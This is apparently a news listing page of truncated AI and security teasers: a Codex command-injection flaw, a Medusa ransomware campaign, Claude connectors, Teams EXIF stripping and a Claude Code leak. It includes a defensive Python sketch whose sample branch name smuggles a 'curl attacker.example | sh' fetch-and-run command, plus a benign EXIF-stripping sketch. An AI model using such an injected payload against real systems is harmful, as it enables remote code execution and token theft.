The rise of AI coding assistants has simplified developer workflows, but a recent discovery shows those conveniences can carry serious risk. Researchers at BeyondTrust found a critical command-injection vulnerability in OpenAI Codex that could be exploited to steal GitHub access tokens. The flaw demonstrates how an overlooked parsing detail — a branch name passed into a container setup script —
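The report describes the flaw only at a high level, but the pattern it names is a classic one. As a minimal sketch (the function names, git command, and URLs below are hypothetical illustrations, not details from BeyondTrust's write-up), interpolating an untrusted branch name into a shell command string lets a crafted name break out of its quoting, while passing it as a discrete argument does not:

```python
def clone_cmd_unsafe(branch: str) -> str:
    # Hypothetical illustration: the branch name is spliced into a shell
    # string, so a crafted name can escape the quotes and append extra
    # commands for the shell to execute.
    return f'git clone --branch "{branch}" https://example.com/repo.git'

def clone_cmd_safe(branch: str) -> list[str]:
    # Safer pattern: build an argv list and bypass the shell entirely;
    # the branch name stays one opaque argument, whatever it contains.
    return ["git", "clone", "--branch", branch, "https://example.com/repo.git"]

malicious = 'main"; curl https://attacker.example/x.sh | sh; echo "'
print(clone_cmd_unsafe(malicious))  # injected command appears in the shell string
print(clone_cmd_safe(malicious))    # branch remains a single list element
```

The safe variant corresponds to running the command via an exec-style API (e.g. `subprocess.run` with a list and no `shell=True`), where no shell ever re-parses the attacker-controlled value.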
Category: Artificial Intelligence
Microsoft Links Medusa Ransomware Affiliate to Zero-Day Exploitation Campaign
Microsoft’s recent analysis tying a Medusa ransomware affiliate to a campaign that leveraged zero-day vulnerabilities has put a renewed spotlight on the evolving tactics of extortion groups and the threat posed by previously unknown software flaws. For security teams and executives, the announcement is a reminder that threat actors are combining rapid vulnerability exploitation with tried-and-true ransomware playbooks to increase
Anthropic opens Microsoft 365 connectors to all Claude plans — what it means for users
Anthropic has quietly broadened access to one of Claude’s most practical integrations: the Microsoft 365 connector. Once reserved for Team and Enterprise subscribers, the connector is now available across every Claude plan — including the free tier — enabling Claude to read and search content stored in Outlook, OneDrive, SharePoint, Teams and Calendar for users tied to an organization’s Microsoft
Microsoft strips EXIF metadata from Teams images to protect employee privacy
In a March 2026 feature rollout, Microsoft updated Teams to automatically remove EXIF metadata from images shared in chats and channels. The change aims to prevent accidental leaks of GPS coordinates, device details, and timestamps, data that can be exploited for targeted attacks or unwanted location disclosure. The move is part of a broader push to bake privacy and security into
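Microsoft has not published how Teams performs the removal, but the underlying idea is simple: EXIF data lives in a JPEG's APP1 marker segment, and dropping that segment strips GPS, device, and timestamp fields without touching pixel data. A minimal sketch of that approach, assuming plain baseline JPEG input:

```python
def strip_exif_jpeg(data: bytes) -> bytes:
    # Walk the JPEG marker segments and drop APP1 (0xFFE1), which
    # carries EXIF metadata; every other segment is copied verbatim.
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    out = bytearray(b"\xff\xd8")
    i = 2
    while i + 4 <= len(data):
        if data[i] != 0xFF:
            break  # malformed segment header; copy the remainder as-is
        marker = data[i + 1]
        if marker == 0xDA:  # Start of Scan: no more headers follow
            out += data[i:]
            return bytes(out)
        seg_len = int.from_bytes(data[i + 2 : i + 4], "big")
        segment = data[i : i + 2 + seg_len]
        if marker != 0xE1:  # keep everything except APP1/EXIF
            out += segment
        i += 2 + seg_len
    out += data[i:]
    return bytes(out)
```

Real-world strippers (and presumably Teams) also handle XMP, PNG/HEIC containers, and re-encoding, but the segment-dropping principle is the same.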
Anthropic’s Claude Leak: 8,000 Takedown Requests After an Accidental Source-Code Exposure
Anthropic has scrambled to contain the fallout after an accidental exposure of the complete source code for its Claude family of AI tools. The company issued roughly 8,000 copyright takedown requests to remove copies and adaptations circulating on code-hosting sites and mirrors, responding to a wave of reposts and forks that appeared within hours of the initial disclosure. Although Anthropic
Inside the Claude Code Leak: What Anthropic’s Accidental Release Reveals
Anthropic, the AI company behind the Claude family of agents, suffered an unexpected exposure that rippled across the developer community and the wider AI market. Earlier today, a sizable JavaScript source map file—bundled with a public npm release—made internal implementation details of Claude Code visible to anyone who downloaded it. What began as a packaging mistake quickly became a public





